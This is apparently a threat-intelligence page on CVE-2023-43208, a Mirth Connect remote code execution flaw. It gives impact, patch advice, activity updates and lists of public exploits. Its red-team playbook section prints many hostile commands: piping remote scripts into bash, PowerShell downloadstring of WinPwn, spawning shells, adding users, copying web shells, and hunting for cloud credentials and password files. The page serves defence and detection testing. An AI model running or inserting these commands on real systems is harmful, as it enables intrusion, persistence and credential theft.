CVE-2023-43208
Overview
This vulnerability is a remote code execution flaw resulting from improper input validation in NextGen Healthcare Mirth Connect versions prior to 4.4.1. The root cause is an incomplete patch addressing a prior vulnerability, allowing injection of operating system commands via crafted HTTP requests. The affected component is the server API endpoints that process user-supplied data without adequate sanitization, enabling execution of arbitrary system commands.
Vulnerability Description
NextGen Healthcare Mirth Connect before version 4.4.1 is vulnerable to unauthenticated remote code execution. Note that this vulnerability is caused by the incomplete patch of CVE-2023-37679.
Impact
An unauthenticated attacker can execute arbitrary system commands on the vulnerable server, potentially gaining full control over the host environment. This enables unauthorized access to sensitive data, manipulation of system processes, and lateral movement within the network. No user interaction or credentials are required, making exploitation straightforward and allowing attackers to compromise the confidentiality, integrity, and availability of the affected system.
Solution
Upgrade NextGen Healthcare Mirth Connect to version 4.4.1 or later, where the incomplete patch has been fully applied to remediate this vulnerability. Refer to the vendor's official advisory and patch notes for detailed instructions. Additional mitigation includes monitoring and restricting access to the exposed API endpoints until the update is applied. Relevant references include the Horizon3 advisory and Packet Storm Security report for patch verification and implementation guidance.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting NextGen Healthcare's Mirth Connect prior to version 4.4.1 is characterized by a critical flaw that allows unauthenticated remote code execution. This issue arises from an incomplete patch of a previously identified vulnerability, indicating a failure in the remediation process. Specifically, the flaw resides in the way the application handles certain requests, allowing an attacker to execute arbitrary code on the server without needing any authentication. This can lead to severe consequences, as the attacker can manipulate the system, access sensitive data, or disrupt services.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker could leverage the flaw by sending specially crafted requests to the Mirth Connect server. Given that the vulnerability allows for unauthenticated access, even individuals with minimal technical skills could potentially exploit it. Scenarios could include deploying malware, exfiltrating sensitive patient data, or even taking control of the entire server infrastructure. The ability to execute arbitrary code remotely opens the door to a wide range of malicious activities, making this vulnerability a prime target for cybercriminals.
The real-world impact of this vulnerability is significant, particularly for healthcare organizations that rely on Mirth Connect for data integration and interoperability. The healthcare sector is already a prime target for cyberattacks due to the sensitive nature of the data involved. A successful exploitation could lead to data breaches, regulatory penalties, and loss of patient trust. Additionally, the operational disruption caused by such an attack could result in financial losses and damage to the organization's reputation. The potential for widespread impact is amplified by the interconnected nature of healthcare systems, where a breach in one system can have cascading effects across multiple platforms.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating software to the latest versions is crucial, as this vulnerability has been addressed in subsequent releases. Organizations should also conduct thorough vulnerability assessments and penetration testing to identify and remediate weaknesses in their systems. Intrusion detection systems can be employed to monitor for unusual activity that may indicate an attempted exploitation. Furthermore, implementing strict access controls and network segmentation can help limit the potential impact of an attack, ensuring that even if a breach occurs, the attacker’s ability to move laterally within the network is restricted.
In conclusion, the vulnerability in Mirth Connect represents a serious threat to healthcare organizations, with the potential for significant operational and reputational damage. The ease of exploitation and the critical nature of the systems involved necessitate immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, organizations can protect themselves against this and similar vulnerabilities, ensuring the integrity and confidentiality of sensitive healthcare data. As the threat landscape continues to evolve, maintaining vigilance and prioritizing cybersecurity will be essential for safeguarding against emerging risks.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-43208, reflecting a modest rise in attempts to exploit this critical unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect. This uptick, while not rapid or widespread, signals persistent adversary interest, likely driven by the availability of multiple proof-of-concept exploits circulating publicly. The continued presence of ransomware groups leveraging this vulnerability underscores its operational relevance in the threat landscape. Although the overall exploit trend remains stable, the incremental increase in detection events suggests that threat actors are maintaining or slightly intensifying their targeting efforts. Consequently, this development reinforces the criticality of timely patching and monitoring, as the vulnerability remains a high-risk vector for compromise in healthcare environments.
Update 2 — July 03, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-43208, reflecting a sustained and slightly intensified exploitation effort by threat actors. This increase coincides with the continued public availability of multiple proof-of-concept exploits, which have facilitated broader adversary engagement, including ransomware groups known to leverage this vulnerability for initial access and lateral movement. Although the overall exploit trend remains stable according to EPSS metrics, our telemetry indicates a sharper rise in targeting attempts, underscoring an elevated operational tempo. This development heightens the urgency for defenders to maintain vigilant monitoring and reinforces the critical nature of this vulnerability as a persistent high-risk vector within healthcare environments. The evolving exploitation landscape suggests that threat actors are capitalizing on the incomplete patching legacy of CVE-2023-37679, sustaining CVE-2023-43208’s relevance in active campaigns.
Update 3 — July 11, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-43208, reflecting a modest rise in adversary activity despite stable EPSS scoring. This uptick coincides with the continued availability of multiple proof-of-concept exploits circulating publicly, which lowers the barrier for threat actors to weaponize this vulnerability. The persistence of ransomware groups leveraging this flaw underscores its ongoing operational value in intrusion campaigns. Although the overall risk profile remains critical due to the vulnerability’s unauthenticated remote code execution capability and incomplete prior patching, the incremental rise in targeting activity signals a need for heightened vigilance. Defenders should interpret this development as an indication that adversaries are actively refining and expanding exploitation efforts, sustaining pressure on healthcare environments reliant on vulnerable versions of Mirth Connect.
Update 4 — July 20, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2023-43208, accompanied by the emergence of additional publicly available proof-of-concept exploits. This uptick in activity, while moderate, signals sustained adversary interest in leveraging the incomplete patching of Mirth Connect versions prior to 4.4.1. Our telemetry indicates that ransomware groups continue to incorporate this vulnerability into their operational toolkits, maintaining pressure on healthcare organizations that have yet to fully remediate affected systems. Although the overall exploit trend remains stable, the proliferation of new exploit code lowers the barrier for less sophisticated actors to attempt compromise, potentially broadening the threat landscape. Consequently, the risk level remains critical, with an increased likelihood of opportunistic exploitation attempts that could lead to significant operational disruption and data compromise within vulnerable environments.
Update 5 — August 04, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-43208, reflected in a significant uptick in detection activity across our sensors. This surge coincides with the emergence of multiple new proof-of-concept exploits publicly available on code-sharing platforms, which lower the technical barrier for adversaries to weaponize this vulnerability. The continued association of this flaw with ransomware actors further amplifies its operational risk, as these groups increasingly integrate the exploit into their attack chains. Although the overall exploit trend remains stable according to EPSS metrics, the qualitative increase in telemetry suggests a widening of the threat actor base and a heightened likelihood of opportunistic attacks against unpatched NextGen Healthcare Mirth Connect deployments. Consequently, the threat level remains critical, with defenders facing increased pressure to detect and mitigate exploitation attempts amid a more accessible and active exploit landscape.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nextgen | Mirth Connect | All |
cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Mirth Connect Deserialization RCE
exploits/multi/http/mirth_connect_cve_2023_43208
|
r00t, Naveen Sunkavally, Spencer McIntyre | Unknown | unix, linux | View |
GitHub PoCs (15)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
K3ysTr0K3R/CVE-2023-43208-EXPLOIT
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
|
K3ysTr0K3R | 29 | 11 | 2024-03-15 | View |
|
predyy/CVE-2023-43208
PoC for CVE-2023-43208 RCE exploitation.
|
predyy | 9 | 0 | 2026-02-25 | View |
|
jakabakos/CVE-2023-43208-mirth-connect-rce-poc
|
jakabakos | 7 | 2 | 2024-03-17 | View |
|
kyakei/CVE-2023-43208
CVE-2023-43208: Mirth Connect Pre-Auth RCE PoC
|
kyakei | 3 | 1 | 2026-02-22 | View |
|
MKIRAHMET/PoC-2023-43208
A proof-of-concept exploit for CVE-2023-43208, a remote code execution vulnerability in Mirth Connect before version 4.4...
|
MKIRAHMET | 3 | 0 | 2026-02-24 | View |
|
Avento/CVE-2023-43208_Detection_PoC
Use java.net.InetAddress for detection
|
Avento | 2 | 0 | 2024-11-28 | View |
|
az4rvs/Mirth-Connect-CVE-2023-43208
Python implementation of CVE-2023-43208 Mirth Connect RCE (Unauth XStream)
|
az4rvs | 2 | 0 | 2026-02-26 | View |
|
Pegasus0xx/CVE-2023-43208
PoC for Mirth Connect Remote Code Execution (RCE)
|
Pegasus0xx | 1 | 0 | 2026-02-22 | View |
|
Criz117/CVE-2023-43208-PoC
Proof‑of‑concept Python script demonstrating CVE‑2023‑43208 in Mirth Connect, allowing version checks and command execut...
|
Criz117 | 1 | 0 | 2026-03-13 | View |
|
4nuxd/CVE-2023-43208
A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)
|
4nuxd | 0 | 1 | 2026-03-12 | View |
|
ledksv/Interpreter-HackTheBox
Writeup for Interpreter — HackTheBox Medium Linux box. CVE-2023-43208 Mirth Connect RCE, PBKDF2 hash cracking, Python ev...
|
ledksv | 0 | 0 | 2026-05-05 | View |
|
J4F9S5D2Q7/CVE-2023-43208-MIRTHCONNECT
|
J4F9S5D2Q7 | 0 | 0 | 2024-06-09 | View |
|
D3m0nicw0lf/CVE-2023-43208
mirth-connect-rce-poc
|
D3m0nicw0lf | 0 | 0 | 2026-02-25 | View |
|
LunaLynx12/cve-2023-43208-poc
|
LunaLynx12 | 0 | 0 | 2026-03-12 | View |
|
Humberto-pixel/CVE-2023-43208-PoC
Explota vulnerabilidad
|
Humberto-pixel | 0 | 0 | 2026-03-28 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-6 | Argument Injection |
40%
|
High | High | |
| CAPEC-88 | OS Command Injection |
40%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-43208 |
| horizon3.ai |
GitHub CVE
|
https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/ |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-43208 |